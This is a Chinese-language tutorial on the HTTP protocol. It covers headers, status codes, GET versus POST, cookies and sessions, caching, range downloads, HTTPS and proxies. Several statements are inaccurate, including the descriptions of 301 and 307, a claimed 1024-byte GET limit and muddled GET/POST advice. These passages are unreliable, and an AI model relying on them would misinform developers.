http://www.blogjava.net/images/blogjava_net/amigoxie/40799/o_http%e5%8d%8f%e8%ae%ae%e5%ad%a6%e4%b9%a0-%e6%a6%82%e5%bf%b5-8.jpg
 

1.6.4 Cache-Control头域

 

Cache-Control指定请求和响应遵循的缓存机制。在请求消息或响应消息中设置Cache-Control并不会修改另一个消息处理过程中的缓存处理过程。请求时的缓存指令包括no-cache、no-store、max-age、max-stale、min-fresh、only-if-cached,响应消息中的指令包括public、private、no-cache、no-store、no-transform、must-revalidate、proxy-revalidate、max-age。

 

在图5中的该头域为:

 

1.6.5 Date头域

 

Date头域表示消息发送的时间,时间的描述格式由rfc822定义。例如,Date:Mon,31Dec200104:25:57GMT。Date描述的时间表示世界标准时,换算成本地时间,需要知道用户所在的时区。

 

图5中,该头域如下图所示:

g.HTTP的几个重要概念

 

1.7.1连接:Connection

 

一个传输层的实际环流,它是建立在两个相互通讯的应用程序之间。

 

在http1.1,request和reponse头中都有可能出现一个connection的头,此header的含义是当client和server通信时对于长链接如何进行处理。

 

在http1.1中,client和server都是默认对方支持长链接的, 如果client使用http1.1协议,但又不希望使用长链接,则需要在header中指明connection的值为close;如果server方也不想支持长链接,则在response中也需要明确说明connection的值为close。不论request还是response的header中包含了值为close的connection,都表明当前正在使用的tcp链接在当天请求处理完毕后会被断掉。以后client再进行新的请求时就必须创建新的tcp链接了。

 

1.7.2消息:Message

 

HTTP通讯的基本单位,包括一个结构化的八元组序列并通过连接传输。

 

1.7.3请求:Request

 

一个从客户端到服务器的请求信息包括应用于资源的方法、资源的标识符和协议的版本号。

 

1.7.4响应:Response

 

一个从服务器返回的信息包括HTTP协议的版本号、请求的状态(例如“成功”或“没找到”)和文档的MIME类型。

 

1.7.5资源:Resource

 

由URI标识的网络数据对象或服务。

 

1.7.6实体:Entity

 

数据资源或来自服务资源的回映的一种特殊表示方法,它可能被包围在一个请求或响应信息中。一个实体包括实体头信息和实体的本身内容。

 

1.7.7客户机:Client

 

一个为发送请求目的而建立连接的应用程序。

 

1.7.8用户代理:UserAgent

 

初始化一个请求的客户机。它们是浏览器、编辑器或其它用户工具。

 

1.7.9服务器:Server

 

一个接受连接并对请求返回信息的应用程序。

 

1.7.10源服务器:Originserver

 

是一个给定资源可以在其上驻留或被创建的服务器。

 

1.7.11代理:Proxy

 

一个中间程序,它可以充当一个服务器,也可以充当一个客户机,为其它客户机建立请求。请求是通过可能的翻译在内部或经过传递到其它的服务器中。一个代理在发送请求信息之前,必须解释并且如果可能重写它。

 

代理经常作为通过防火墙的客户机端的门户,代理还可以作为一个帮助应用来通过协议处理没有被用户代理完成的请求。

 

1.7.12网关:Gateway

 

一个作为其它服务器中间媒介的服务器。与代理不同的是,网关接受请求就好象对被请求的资源来说它就是源服务器;发出请求的客户机并没有意识到它在同网关打交道。

 

网关经常作为通过防火墙的服务器端的门户,网关还可以作为一个协议翻译器以便存取那些存储在非HTTP系统中的资源。

 

1.7.13通道:Tunnel

 

是作为两个连接中继的中介程序。一旦激活,通道便被认为不属于HTTP通讯,尽管通道可能是被一个HTTP请求初始化的。当被中继的连接两端关闭时,通道便消失。当一个门户(Portal)必须存在或中介(Intermediary)不能解释中继的通讯时通道被经常使用。

 

1.7.14缓存:Cache

 

反应信息的局域存储。

 

    附录:参考资料

 

《http_百度百科》:http://baike.baidu.com/view/9472.htm

 

《结果编码和http状态响应码》:http://blog.tieniu1980.cn/archives/377

 

《分析TCP的三次握手》:

 

http://cache.baidu.com/c?m=9f65cb4a8c8507ed4fece763104c8c711923d030678197027fa3c215cc7905141130a8e5747e0d548d98297a5ae91e03f7f63772315477e3cacdd94cdbbdc42225d82c36734f844315c419d891007a9f34d507a9f916a2e1b065d2f48193864353bb15543897f1fb4d711edd1b86033093b1e94e022e67adec40728e2e605f983431c5508fe4&p=c6769a46c5820efd08e2973b42&user=baidu

 

《使用Wireshark来检测一次HTTP连接过程》:

 

http://blog.163.com/wangbo_tester/blog/static/12806792120098174162288/

 

《http协议的几个重要概念》:http://nc.mofcom.gov.cn/news/10819972.html

 

《http协议中connection头的作用》:

 

http://blog.csdn.net/barfoo/archive/2008/06/05/2514667.aspx

2. 协议详解篇

 

2.1 HTTP/1.0和HTTP/1.1的比较

 

RFC 1945定义了HTTP/1.0版本,RFC 2616定义了HTTP/1.1版本。

 

笔者在blog上提供了这两个RFC中文版的下载地址。

 

RFC1945下载地址:

 

http://www.blogjava.net/Files/amigoxie/RFC1945(HTTP)中文版.rar

 

RFC2616下载地址:

 

http://www.blogjava.net/Files/amigoxie/RFC2616(HTTP)中文版.rar

 

2.1.1建立连接方面

 

HTTP/1.0 每次请求都需要建立新的TCP连接,连接不能复用。HTTP/1.1 新的请求可以在上次请求建立的TCP连接之上发送,连接可以复用。优点是减少重复进行TCP三次握手的开销,提高效率。

 

注意:在同一个TCP连接中,新的请求需要等上次请求收到响应后,才能发送。

 

2.1.2 Host域

 

HTTP1.1在Request消息头里头多了一个Host域, HTTP1.0则没有这个域。

 

Eg:

 

    GET /pub/WWW/TheProject.html HTTP/1.1
    Host: www.w3.org

 

可能HTTP1.0的时候认为,建立TCP连接的时候已经指定了IP地址,这个IP地址上只有一个host。

 

2.1.3日期时间戳

 

(接收方向)

 

无论是HTTP1.0还是HTTP1.1,都要能解析下面三种date/time stamp:

 

Sun, 06 Nov 1994 08:49:37 GMT ; RFC 822, updated by RFC 1123
Sunday, 06-Nov-94 08:49:37 GMT ; RFC 850, obsoleted by RFC 1036
Sun Nov 6 08:49:37 1994       ; ANSI C’s asctime() format

 

(发送方向)

 

HTTP1.0要求不能生成第三种asctime格式的date/time stamp;

 

HTTP1.1则要求只生成RFC 1123(第一种)格式的date/time stamp。

 

2.1.4状态响应码

 

状态响应码100 (Continue) 状态代码的使用,允许客户端在发request消息body之前先用request header试探一下server,看server要不要接收request body,再决定要不要发request body。

 

客户端在Request头部中包含

 

Expect: 100-continue

 

Server看到之后呢如果回100 (Continue) 这个状态代码,客户端就继续发request body。这个是HTTP1.1才有的。

 

另外在HTTP/1.1中还增加了101、203、205等等性状态响应码

 

2.1.5请求方式

 

HTTP1.1增加了OPTIONS, PUT, DELETE, TRACE, CONNECT这些Request方法.

 

Method        = “OPTIONS”                ; Section 9.2

 

| “GET”                    ; Section 9.3

 

| “HEAD”                  ; Section 9.4

 

| “POST”                  ; Section 9.5

 

| “PUT”                    ; Section 9.6

 

| “DELETE”                ; Section 9.7

 

| “TRACE”                  ; Section 9.8

 

| “CONNECT”                ; Section 9.9

 

| extension-method

 

extension-method = token

 

2.2 HTTP请求消息

 

2.2.1请求消息格式

 

请求消息格式如下所示:

 

请求行

 

通用信息头|请求头|实体头

 

CRLF(回车换行)

 

实体内容

 

其中“请求行”为:请求行 = 方法 [空格] 请求URI [空格] 版本号 [回车换行]

 

请求行实例:

 

Eg1:

 

GET /index.html HTTP/1.1

 

Eg2:

 

POST http://192.168.2.217:8080/index.jsp HTTP/1.1

 

HTTP请求消息实例:

 

GET /hello.htm HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
If-Modified-Since: Wed, 17 Oct 2007 02:15:55 GMT
If-None-Match: W/”158-1192587355000″
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.168.2.162:8080
Connection: Keep-Alive

 

 

 

2.2.2请求方法

 

HTTP的请求方法包括如下几种:

 

q      GET

 

q      POST

 

q      HEAD

 

q      PUT

 

q      DELETE

 

q      OPTIONS

 

q      TRACE

 

q      CONNECT

 

2.3 HTTP响应消息

 

2.3.1响应消息格式

 

HTTP响应消息的格式如下所示:

 

状态行

 

通用信息头|响应头|实体头

 

CRLF

 

实体内容

 

其中:状态行 = 版本号 [空格] 状态码 [空格] 原因 [回车换行]

 

状态行举例:

 

Eg1:

 

HTTP/1.0 200 OK

 

Eg2:

 

HTTP/1.1 400 Bad Request

 

HTTP响应消息实例如下所示:

 

HTTP/1.1 200 OK
ETag: W/”158-1192590101000″
Last-Modified: Wed, 17 Oct 2007 03:01:41 GMT
Content-Type: text/html
Content-Length: 158
Date: Wed, 17 Oct 2007 03:01:59 GMT
Server: Apache-Coyote/1.1

 

2.3.2 http的状态响应码

 

2.3.2.1  1**:请求收到,继续处理

 

100——客户必须继续发出请求

 

101——客户要求服务器根据请求转换HTTP协议版本

 

2.3.2.2  2**:操作成功收到,分析、接受

 

200——交易成功
201——提示知道新文件的URL

 

202——接受和处理、但处理未完成

 

203——返回信息不确定或不完整

 

204——请求收到,但返回信息为空

 

205——服务器完成了请求,用户代理必须复位当前已经浏览过的文件

 

206——服务器已经完成了部分用户的GET请求

 

2.3.2.3  3**:完成此请求必须进一步处理

 

300——请求的资源可在多处得到

 

301——删除请求数据

 

302——在其他地址发现了请求数据

 

303——建议客户访问其他URL或访问方式

 

304——客户端已经执行了GET,但文件未变化

 

305——请求的资源必须从服务器指定的地址得到

 

306——前一版本HTTP中使用的代码,现行版本中不再使用

 

307——申明请求的资源临时性删除

 

2.3.2.4  4**:请求包含一个错误语法或不能完成

 

400——错误请求,如语法错误

 

401——未授权

 

HTTP 401.1 – 未授权:登录失败

 

  HTTP 401.2 – 未授权:服务器配置问题导致登录失败

 

  HTTP 401.3 – ACL 禁止访问资源

 

  HTTP 401.4 – 未授权:授权被筛选器拒绝

 

HTTP 401.5 – 未授权:ISAPI 或 CGI 授权失败

 

402——保留有效ChargeTo头响应

 

403——禁止访问

 

HTTP 403.1 禁止访问:禁止可执行访问

 

  HTTP 403.2 – 禁止访问:禁止读访问

 

  HTTP 403.3 – 禁止访问:禁止写访问

 

  HTTP 403.4 – 禁止访问:要求 SSL

 

  HTTP 403.5 – 禁止访问:要求 SSL 128

 

  HTTP 403.6 – 禁止访问:IP 地址被拒绝

 

  HTTP 403.7 – 禁止访问:要求客户证书

 

  HTTP 403.8 – 禁止访问:禁止站点访问

 

  HTTP 403.9 – 禁止访问:连接的用户过多

 

  HTTP 403.10 – 禁止访问:配置无效

 

  HTTP 403.11 – 禁止访问:密码更改

 

  HTTP 403.12 – 禁止访问:映射器拒绝访问

 

  HTTP 403.13 – 禁止访问:客户证书已被吊销

 

  HTTP 403.15 – 禁止访问:客户访问许可过多

 

  HTTP 403.16 – 禁止访问:客户证书不可信或者无效

 

HTTP 403.17 – 禁止访问:客户证书已经到期或者尚未生效

 

404——没有发现文件、查询或URl

 

405——用户在Request-Line字段定义的方法不允许

 

406——根据用户发送的Accept拖,请求资源不可访问

 

407——类似401,用户必须首先在代理服务器上得到授权

 

408——客户端没有在用户指定的饿时间内完成请求

 

409——对当前资源状态,请求不能完成

 

410——服务器上不再有此资源且无进一步的参考地址

 

411——服务器拒绝用户定义的Content-Length属性请求

 

412——一个或多个请求头字段在当前请求中错误

 

413——请求的资源大于服务器允许的大小

 

414——请求的资源URL长于服务器允许的长度

 

415——请求资源不支持请求项目格式

 

416——请求中包含Range请求头字段,在当前请求资源范围内没有range指示值,请求也不包含If-Range请求头字段

 

417——服务器不满足请求Expect头字段指定的期望值,如果是代理服务器,可能是下一级服务器不能满足请求长。

 

2.3.2.5  5**:服务器执行一个完全有效请求失败

 

  HTTP 500 – 内部服务器错误

 

  HTTP 500.100 – 内部服务器错误 – ASP 错误

 

  HTTP 500-11 服务器关闭

 

  HTTP 500-12 应用程序重新启动

 

  HTTP 500-13 – 服务器太忙

 

  HTTP 500-14 – 应用程序无效

 

  HTTP 500-15 – 不允许请求 global.asa

 

  Error 501 – 未实现

 

HTTP 502 – 网关错误

 

2.4 使用telnet进行http测试

 

在Windows下,可使用命令窗口进行http简单测试。

 

输入cmd进入命令窗口,在命令行键入如下命令后按回车:

 

telnet www.baidu.com 80

 

而后在窗口中按下“Ctrl+]”后按回车可让返回结果回显。

 

接着开始发请求消息,例如发送如下请求消息请求baidu的首页消息,使用的HTTP协议为HTTP/1.1:

 

GET /index.html HTTP/1.1

 

注意:copy如上的消息到命令窗口后需要按两个回车换行才能得到响应的消息,第一个回车换行是在命令后键入回车换行,是HTTP协议要求的。第二个是确认输入,发送请求。

 

可看到返回了200 OK的消息,如下图所示:

 

可看到,当采用HTTP/1.1时,连接不是在请求结束后就断开的。若采用HTTP1.0,在命令窗口键入:

 

GET /index.html HTTP/1.0

 

此时可以看到请求结束之后马上断开。

 

读者还可以尝试在使用GET或POST等时,带上头域信息,例如键入如下信息:

 

GET /index.html HTTP/1.1
connection: close
Host: www.baidu.com

 

2.5 常用的请求方式

 

常用的请求方式是GET和POST.

 

l         GET方式:是以实体的方式得到由请求URI所指定资源的信息,如果请求URI只是一个数据产生过程,那么最终要在响应实体中返回的是处理过程的结果所指向的资源,而不是处理过程的描述。

 

l         POST方式:用来向目的服务器发出请求,要求它接受被附在请求后的实体,并把它当作请求队列中请求URI所指定资源的附加新子项,Post被设计成用统一的方法实现下列功能:

 

1:对现有资源的解释;

 

2:向电子公告栏、新闻组、邮件列表或类似讨论组发信息;

 

3:提交数据块;

 

4:通过附加操作来扩展数据库 。

 

从上面描述可以看出,Get是向服务器发索取数据的一种请求;而Post是向服务器提交数据的一种请求,要提交的数据位于信息头后面的实体中。

 

GET与POST方法有以下区别:

 

(1)   在客户端,Get方式在通过URL提交数据,数据在URL中可以看到;POST方式,数据放置在HTML HEADER内提交。

 

(2)  GET方式提交的数据最多只能有1024字节,而POST则没有此限制。

 

(3)   安全性问题。正如在(1)中提到,使用 Get 的时候,参数会显示在地址栏上,而Post 不会。所以,如果这些数据是中文数据而且是非敏感数据,那么使用 get;如果用户输入的数据不是中文字符而且包含敏感数据,那么还是使用 post为好。

 

(4)   安全的和幂等的。所谓安全的意味着该操作用于获取信息而非修改信息。幂等的意味着对同一 URL 的多个请求应该返回同样的结果。完整的定义并不像看起来那样严格。换句话说,GET请求一般不应产生副作用。从根本上讲,其目标是当用户打开一个链接时,她可以确信从自身的角度来看没有改变资源。比如,新闻站点的头版不断更新。虽然第二次请求会返回不同的一批新闻,该操作仍然被认为是安全的和幂等的,因为它总是返回当前的新闻。反之亦然。POST 请求就不那么轻松了。POST 表示可能改变服务器上的资源的请求。仍然以新闻站点为例,读者对文章的注解应该通过 POST 请求实现,因为在注解提交之后站点已经不同了(比方说文章下面出现一条注解)。
 

2.6 请求头

 

HTTP最常见的请求头如下:

 

l         Accept:浏览器可接受的MIME类型;

 

l         Accept-Charset:浏览器可接受的字符集;

 

l         Accept-Encoding:浏览器能够进行解码的数据编码方式,比如gzip。Servlet能够向支持gzip的浏览器返回经gzip编码的HTML页面。许多情形下这可以减少5到10倍的下载时间;

 

l         Accept-Language:浏览器所希望的语言种类,当服务器能够提供一种以上的语言版本时要用到;

 

l         Authorization:授权信息,通常出现在对服务器发送的WWW-Authenticate头的应答中;

 

l         Connection:表示是否需要持久连接。如果Servlet看到这里的值为“Keep-Alive”,或者看到请求使用的是HTTP 1.1(HTTP 1.1默认进行持久连接),它就可以利用持久连接的优点,当页面包含多个元素时(例如Applet,图片),显著地减少下载所需要的时间。要实现这一点,Servlet需要在应答中发送一个Content-Length头,最简单的实现方法是:先把内容写入ByteArrayOutputStream,然后在正式写出内容之前计算它的大小;

 

l         Content-Length:表示请求消息正文的长度;

 

l         Cookie:这是最重要的请求头信息之一;

 

l         From:请求发送者的email地址,由一些特殊的Web客户程序使用,浏览器不会用到它;

 

l         Host:初始URL中的主机和端口;

 

l         If-Modified-Since:只有当所请求的内容在指定的日期之后又经过修改才返回它,否则返回304“Not Modified”应答;

 

l         Pragma:指定“no-cache”值表示服务器必须返回一个刷新后的文档,即使它是代理服务器而且已经有了页面的本地拷贝;

 

l         Referer:包含一个URL,用户从该URL代表的页面出发访问当前请求的页面。

 

l         User-Agent:浏览器类型,如果Servlet返回的内容与浏览器类型有关则该值非常有用;

 

l         UA-Pixels,UA-Color,UA-OS,UA-CPU:由某些版本的IE浏览器所发送的非标准的请求头,表示屏幕大小、颜色深度、操作系统和CPU类型。

 

2.7 响应头

 

HTTP最常见的响应头如下所示:

 

l         Allow:服务器支持哪些请求方法(如GET、POST等);

 

l         Content-Encoding:文档的编码(Encode)方法。只有在解码之后才可以得到Content-Type头指定的内容类型。利用gzip压缩文档能够显著地减少HTML文档的下载时间。Java的GZIPOutputStream可以很方便地进行gzip压缩,但只有Unix上的Netscape和Windows上的IE 4、IE 5才支持它。因此,Servlet应该通过查看Accept-Encoding头(即request.getHeader(“Accept-Encoding”))检查浏览器是否支持gzip,为支持gzip的浏览器返回经gzip压缩的HTML页面,为其他浏览器返回普通页面;

 

l         Content-Length:表示内容长度。只有当浏览器使用持久HTTP连接时才需要这个数据。如果你想要利用持久连接的优势,可以把输出文档写入ByteArrayOutputStram,完成后查看其大小,然后把该值放入Content-Length头,最后通过byteArrayStream.writeTo(response.getOutputStream()发送内容;

 

l         Content-Type: 表示后面的文档属于什么MIME类型。Servlet默认为text/plain,但通常需要显式地指定为text/html。由于经常要设置Content-Type,因此HttpServletResponse提供了一个专用的方法setContentTyep。 可在web.xml文件中配置扩展名和MIME类型的对应关系;

 

l         Date:当前的GMT时间。你可以用setDateHeader来设置这个头以避免转换时间格式的麻烦;

 

l         Expires:指明应该在什么时候认为文档已经过期,从而不再缓存它。

 

l         Last-Modified:文档的最后改动时间。客户可以通过If-Modified-Since请求头提供一个日期,该请求将被视为一个条件GET,只有改动时间迟于指定时间的文档才会返回,否则返回一个304(Not Modified)状态。Last-Modified也可用setDateHeader方法来设置;

 

l         Location:表示客户应当到哪里去提取文档。Location通常不是直接设置的,而是通过HttpServletResponse的sendRedirect方法,该方法同时设置状态代码为302;

 

l         Refresh:表示浏览器应该在多少时间之后刷新文档,以秒计。除了刷新当前文档之外,你还可以通过setHeader(“Refresh”, “5; URL=http://host/path”)让浏览器读取指定的页面。注意这种功能通常是通过设置HTML页面HEAD区的<META HTTP-EQUIV=”Refresh” CONTENT=”5;URL=http://host/path”>实现,这是因为,自动刷新或重定向对于那些不能使用CGI或Servlet的HTML编写者十分重要。但是,对于Servlet来说,直接设置Refresh头更加方便。注意Refresh的意义是“N秒之后刷新本页面或访问指定页面”,而不是“每隔N秒刷新本页面或访问指定页面”。因此,连续刷新要求每次都发送一个Refresh头,而发送204状态代码则可以阻止浏览器继续刷新,不管是使用Refresh头还是<META HTTP-EQUIV=”Refresh” …>。注意Refresh头不属于HTTP 1.1正式规范的一部分,而是一个扩展,但Netscape和IE都支持它。

 

2.8实体头

 

实体头用坐实体内容的元信息,描述了实体内容的属性,包括实体信息类型,长度,压缩方法,最后一次修改时间,数据有效性等。

 

l         Allow:GET,POST

 

l         Content-Encoding:文档的编码(Encode)方法,例如:gzip,见“2.5 响应头”;

 

l         Content-Language:内容的语言类型,例如:zh-cn;

 

l         Content-Length:表示内容长度,eg:80,可参考“2.5响应头”;

 

l         Content-Location:表示客户应当到哪里去提取文档,例如:http://www.dfdf.org/dfdf.html,可参考“2.5响应头”;

 

l         Content-MD5:MD5 实体的一种MD5摘要,用作校验和。发送方和接受方都计算MD5摘要,接受方将其计算的值与此头标中传递的值进行比较。Eg1:Content-MD5: <base64 of 128 MD5 digest>。Eg2:dfdfdfdfdfdfdff==;

 

l         Content-Range:随部分实体一同发送;标明被插入字节的低位与高位字节偏移,也标明此实体的总长度。Eg1:Content-Range: 1001-2000/5000,eg2:bytes 2543-4532/7898

 

l         Content-Type:标明发送或者接收的实体的MIME类型。Eg:text/html; charset=GB2312       主类型/子类型;

 

l         Expires:为0证明不缓存;

 

l         Last-ModifiedWEB 服务器认为对象的最后修改时间,比如文件的最后修改时间,动态页面的最后产生时间等等。例如:Last-Modified:Tue, 06 May 2008 02:42:43 GMT.

 

2.8扩展头

 

在HTTP消息中,也可以使用一些再HTTP1.1正式规范里没有定义的头字段,这些头字段统称为自定义的HTTP头或者扩展头,他们通常被当作是一种实体头处理。

 

现在流行的浏览器实际上都支持Cookie,Set-Cookie,Refresh和Content-Disposition等几个常用的扩展头字段。

 

l         Refresh:1;url=http://www.dfdf.org  //过1秒跳转到指定位置;

 

l         Content-Disposition:头字段,可参考“2.5响应头”;

 

l         Content-Type:WEB 服务器告诉浏览器自己响应的对象的类型。

 

eg1:Content-Type:application/xml ;

 

eg2:applicaiton/octet-stream;

 

Content-Disposition:attachment; filename=aaa.zip。
附录:参考资料

 

《HTTP1.1和HTTP1.0的区别》:

 

http://blog.csdn.net/yanghehong/archive/2009/05/28/4222594.aspx

 

《HTTP请求(GET和POST区别)和响应》:

 

http://www.blogjava.net/honeybee/articles/164008.html
 

《HTTP请求头概述_百度知道》:

 

http://zhidao.baidu.com/question/32517427.html

 

《实体头和扩展头》:

 

http://www.cnblogs.com/tongzhiyong/archive/2008/03/16/1108776.html

 

3. 深入了解篇

 

3.1 Cookie和Session

 

Cookie和Session都为了用来保存状态信息,都是保存客户端状态的机制,它们都是为了解决HTTP无状态的问题而所做的努力。

 

Session可以用Cookie来实现,也可以用URL回写的机制来实现。用Cookie来实现的Session可以认为是对Cookie更高级的应用。

 

3.1.1两者比较

 

Cookie和Session有以下明显的不同点:

 

1)Cookie将状态保存在客户端,Session将状态保存在服务器端;

 

2)Cookies是服务器在本地机器上存储的小段文本并随每一个请求发送至同一个服务器。Cookie最早在RFC2109中实现,后续RFC2965做了增强。网络服务器用HTTP头向客户端发送cookies,在客户终端,浏览器解析这些cookies并将它们保存为一个本地文件,它会自动将同一服务器的任何请求缚上这些cookies。Session并没有在HTTP的协议中定义;

 

3)Session是针对每一个用户的,变量的值保存在服务器上,用一个sessionID来区分是哪个用户session变量,这个值是通过用户的浏览器在访问的时候返回给服务器,当客户禁用cookie时,这个值也可能设置为由get来返回给服务器;

 

4)就安全性来说:当你访问一个使用session 的站点,同时在自己机子上建立一个cookie,建议在服务器端的SESSION机制更安全些.因为它不会任意读取客户存储的信息。

 

3.1.2 Session机制

 

Session机制是一种服务器端的机制,服务器使用一种类似于散列表的结构(也可能就是使用散列表)来保存信息。

 

当程序需要为某个客户端的请求创建一个session的时候,服务器首先检查这个客户端的请求里是否已包含了一个session标识 – 称为 session id,如果已包含一个session id则说明以前已经为此客户端创建过session,服务器就按照session id把这个 session检索出来使用(如果检索不到,可能会新建一个),如果客户端请求不包含session id,则为此客户端创建一个session并且生成一个与此session相关联的session id,session id的值应该是一个既不会重复,又不容易被找到规律以仿造的字符串,这个 session id将被在本次响应中返回给客户端保存。

 

3.1.6 Session的实现方式

 

3.1.6.1  使用Cookie来实现

 

服务器给每个Session分配一个唯一的JSESSIONID,并通过Cookie发送给客户端。

 

当客户端发起新的请求的时候,将在Cookie头中携带这个JSESSIONID。这样服务器能够找到这个客户端对应的Session。

 

流程如下图所示:

 

3.1.6.2  使用URL回显来实现

 

URL回写是指服务器在发送给浏览器页面的所有链接中都携带JSESSIONID的参数,这样客户端点击任何一个链接都会把JSESSIONID带会服务器。

 

如果直接在浏览器输入服务端资源的url来请求该资源,那么Session是匹配不到的。

 

Tomcat对Session的实现,是一开始同时使用Cookie和URL回写机制,如果发现客户端支持Cookie,就继续使用Cookie,停止使用URL回写。如果发现Cookie被禁用,就一直使用URL回写。jsp开发处理到Session的时候,对页面中的链接记得使用response.encodeURL() 。

 

3.1.3在J2EE项目中Session失效的几种情况

 

1)Session超时:Session在指定时间内失效,例如30分钟,若在30分钟内没有操作,则Session会失效,例如在web.xml中进行了如下设置:

 

<session-config>
<session-timeout>30</session-timeout> //单位:分钟
</session-config>

 

2)使用session.invalidate()明确的去掉Session。

 

3.1.4与Cookie相关的HTTP扩展头

 

1)Cookie:客户端将服务器设置的Cookie返回到服务器;

 

2)Set-Cookie:服务器向客户端设置Cookie;

 

3)Cookie2 (RFC2965)):客户端指示服务器支持Cookie的版本;

 

4)Set-Cookie2 (RFC2965):服务器向客户端设置Cookie。

 

3.1.5Cookie的流程

 

服务器在响应消息中用Set-Cookie头将Cookie的内容回送给客户端,客户端在新的请求中将相同的内容携带在Cookie头中发送给服务器。从而实现会话的保持。

 

流程如下图所示:

 

3.2 缓存的实现原理

 

3.2.1什么是Web缓存

 

WEB缓存(cache)位于Web服务器和客户端之间。

 

缓存会根据请求保存输出内容的副本,例如html页面,图片,文件,当下一个请求来到的时候:如果是相同的URL,缓存直接使用副本响应访问请求,而不是向源服务器再次发送请求。

 

HTTP协议定义了相关的消息头来使WEB缓存尽可能好的工作。

 

3.2.2缓存的优点

 

q      减少相应延迟:因为请求从缓存服务器(离客户端更近)而不是源服务器被相应,这个过程耗时更少,让web服务器看上去相应更快。

 

q      减少网络带宽消耗:当副本被重用时会减低客户端的带宽消耗;客户可以节省带宽费用,控制带宽的需求的增长并更易于管理。

 

3.2.3与缓存相关的HTTP扩展消息头

 

q      Expires:指示响应内容过期的时间,格林威治时间GMT

 

q      Cache-Control:更细致的控制缓存的内容

 

q      Last-Modified:响应中资源最后一次修改的时间

 

q      ETag:响应中资源的校验值,在服务器上某个时段是唯一标识的。

 

q      Date:服务器的时间

 

q      If-Modified-Since:客户端存取的该资源最后一次修改的时间,同Last-Modified。

 

q      If-None-Match:客户端存取的该资源的检验值,同ETag。

 

3.2.4客户端缓存生效的常见流程

 

服务器收到请求时,会在200OK中回送该资源的Last-Modified和ETag头,客户端将该资源保存在cache中,并记录这两个属性。当客户端需要发送相同的请求时,会在请求中携带If-Modified-Since和If-None-Match两个头。两个头的值分别是响应中Last-Modified和ETag头的值。服务器通过这两个头判断本地资源未发生变化,客户端不需要重新下载,返回304响应。常见流程如下图所示:

 

3.2.5 Web缓存机制

 

HTTP/1.1中缓存的目的是为了在很多情况下减少发送请求,同时在许多情况下可以不需要发送完整响应。前者减少了网络回路的数量;HTTP利用一个“过期(expiration)”机制来为此目的。后者减少了网络应用的带宽;HTTP用“验证(validation)”机制来为此目的。

 

HTTP定义了3种缓存机制:

 

1)Freshness:允许一个回应消息可以在源服务器不被重新检查,并且可以由服务器和客户端来控制。例如,Expires回应头给了一个文档不可用的时间。Cache-Control中的max-age标识指明了缓存的最长时间;

 

2)Validation:用来检查以一个缓存的回应是否仍然可用。例如,如果一个回应有一个Last-Modified回应头,缓存能够使用If-Modified-Since来判断是否已改变,以便判断根据情况发送请求;

 

3)Invalidation 在另一个请求通过缓存的时候,常常有一个副作用。例如,如果一个URL关联到一个缓存回应,但是其后跟着POST、PUT和DELETE的请求的话,缓存就会过期。

 

3.3 断点续传和多线程下载的实现原理

 

q      HTTP协议的GET方法,支持只请求某个资源的某一部分;

 

q      206 Partial Content 部分内容响应;

 

q      Range 请求的资源范围;

 

q      Content-Range 响应的资源范围;

 

q      在连接断开重连时,客户端只请求该资源未下载的部分,而不是重新请求整个资源,来实现断点续传。

 

分块请求资源实例:

 

Eg1:Range: bytes=306302- :请求这个资源从306302个字节到末尾的部分;

 

Eg2:Content-Range: bytes 306302-604047/604048:响应中指示携带的是该资源的第306302-604047的字节,该资源共604048个字节;

 

客户端通过并发的请求相同资源的不同片段,来实现对某个资源的并发分块下载。从而达到快速下载的目的。目前流行的FlashGet和迅雷基本都是这个原理。

 

多线程下载的原理:

 

q      下载工具开启多个发出HTTP请求的线程;

 

q      每个http请求只请求资源文件的一部分:Content-Range: bytes 20000-40000/47000;

 

q      合并每个线程下载的文件。

 

3.4 https通信过程

 

3.4.1什么是https

 

HTTPS(全称:Hypertext Transfer Protocol over Secure Socket Layer),是以安全为目标的HTTP通道,简单讲是HTTP的安全版。即HTTP下加入SSL层,HTTPS的安全基础是SSL,因此加密的详细内容请看SSL。

 

见下图:

 

https所用的端口号是443。

 

3.4.2 https的实现原理

 

有两种基本的加解密算法类型:

 

1)对称加密:密钥只有一个,加密解密为同一个密码,且加解密速度快,典型的对称加密算法有DES、AES等;

 

2)非对称加密:密钥成对出现(且根据公钥无法推知私钥,根据私钥也无法推知公钥),加密解密使用不同密钥(公钥加密需要私钥解密,私钥加密需要公钥解密),相对对称加密速度较慢,典型的非对称加密算法有RSA、DSA等。

 

下面看一下https的通信过程:

 

https通信的优点:

 

1)客户端产生的密钥只有客户端和服务器端能得到;

 

2)加密的数据只有客户端和服务器端才能得到明文;

 

3)客户端到服务端的通信是安全的。

 

3.5 http代理

 

3.5.1 http代理服务器

 

代理服务器英文全称是Proxy Server,其功能就是代理网络用户去取得网络信息。形象的说:它是网络信息的中转站。

 

代理服务器是介于浏览器和Web服务器之间的一台服务器,有了它之后,浏览器不是直接到Web服务器去取回网页而是向代理服务器发出请求,Request信号会先送到代理服务器,由代理服务器来取回浏览器所需要的信息并传送给你的浏览器。

 

而且,大部分代理服务器都具有缓冲的功能,就好象一个大的Cache,它有很大的存储空间,它不断将新取得数据储存到它本机的存储器上,如果浏览器所请求的数据在它本机的存储器上已经存在而且是最新的,那么它就不重新从Web服务器取数据,而直接将存储器上的数据传送给用户的浏览器,这样就能显著提高浏览速度和效率。

 

更重要的是:Proxy Server(代理服务器)是Internet链路级网关所提供的一种重要的安全功能,它的工作主要在开放系统互联(OSI)模型的对话层。

 

3.5.2 http代理服务器的主要功能

 

主要功能如下:

 

1)突破自身IP访问限制,访问国外站点。如:教育网、169网等网络用户可以通过代理访问国外网站;

 

2)访问一些单位或团体内部资源,如某大学FTP(前提是该代理地址在该资源的允许访问范围之内),使用教育网内地址段免费代理服务器,就可以用于对教育 网开放的各类FTP下载上传,以及各类资料查询共享等服务;

 

3)突破中国电信的IP封锁:中国电信用户有很多网站是被限制访问的,这种限制是人为的,不同Serve对地址的封锁是不同的。所以不能访问时可以换一个国 外的代理服务器试试;

 

4)提高访问速度:通常代理服务器都设置一个较大的硬盘缓冲区,当有外界的信息通过时,同时也将其保存到缓冲区中,当其他用户再访问相同的信息时, 则直接由缓冲区中取出信息,传给用户,以提高访问速度;

 

5)隐藏真实IP:上网者也可以通过这种方法隐藏自己的IP,免受攻击。

 

3.5.3 http代理图示

 

http代理的图示见下图:

 

